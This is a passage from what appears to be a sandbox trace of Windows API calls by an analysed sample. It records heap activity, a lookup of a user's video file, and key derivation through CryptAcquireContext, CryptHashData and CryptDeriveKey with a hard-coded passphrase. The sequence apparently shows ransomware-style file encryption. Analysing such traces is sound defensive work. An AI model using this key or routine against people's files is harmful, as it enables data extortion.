hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0107.549] FreeLibrary (hLibModule=0x772d0000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0107.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0107.551] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0107.551] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0107.551] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0107.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0107.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0107.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0107.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0107.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0107.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0107.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0107.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0107.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0107.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0107.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0107.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0107.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0107.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0107.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0107.553] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0107.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca9d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0107.554] CloseHandle (hObject=0x298) returned 1 [0107.554] FreeLibrary (hLibModule=0x772d0000) returned 1 [0107.554] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0107.554] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\vBQeWbI.swf", lpFindFileData=0x144e3c8 | out: lpFindFileData=0x144e3c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ad61f30, ftCreationTime.dwHighDateTime=0x1d5eb2c, ftLastAccessTime.dwLowDateTime=0xc34a6b00, ftLastAccessTime.dwHighDateTime=0x1d5ea38, ftLastWriteTime.dwLowDateTime=0xc34a6b00, ftLastWriteTime.dwHighDateTime=0x1d5ea38, nFileSizeHigh=0x0, nFileSizeLow=0xbdbc, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="vBQeWbI.swf", cAlternateFileName="")) returned 0x41ac780 [0107.554] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0107.554] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0107.555] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0107.555] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0107.555] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.555] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0107.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0107.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0107.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0107.555] CryptAcquireContextA (in: phProv=0x144e0a8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e0a8*=0x41a5250) returned 1 [0107.556] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0107.556] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0107.556] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0107.556] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0107.556] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0107.556] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0107.556] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.556] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0107.556] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0107.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cadd8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0107.557] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144de18 | out: phHash=0x144de18) returned 1 [0107.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0107.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0107.557] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0107.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0107.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0107.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.557] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0107.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cb000, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0107.557] CryptHashData (hHash=0x41ac040, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0107.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.557] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0107.557] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0107.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb060, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0107.558] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac040, dwFlags=0x1, phKey=0x144de18 | out: phKey=0x144de18*=0x41ac180) returned 1 [0107.558] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.558] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0107.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0107.558] CryptDestroyHash (hHash=0x41ac040) returned 1 [0107.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0107.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0107.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0107.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0107.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0107.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0107.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0107.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0107.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0107.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0107.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0107.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0107.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0107.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0107.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0107.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0107.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0107.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0107.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0107.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0107.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0107.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0107.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0107.559] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0107.559] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0107.559] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0107.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0107.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0107.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0107.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0107.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0107.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0107.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0107.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0107.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0107.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0107.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0107.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0107.560] CreateFileW 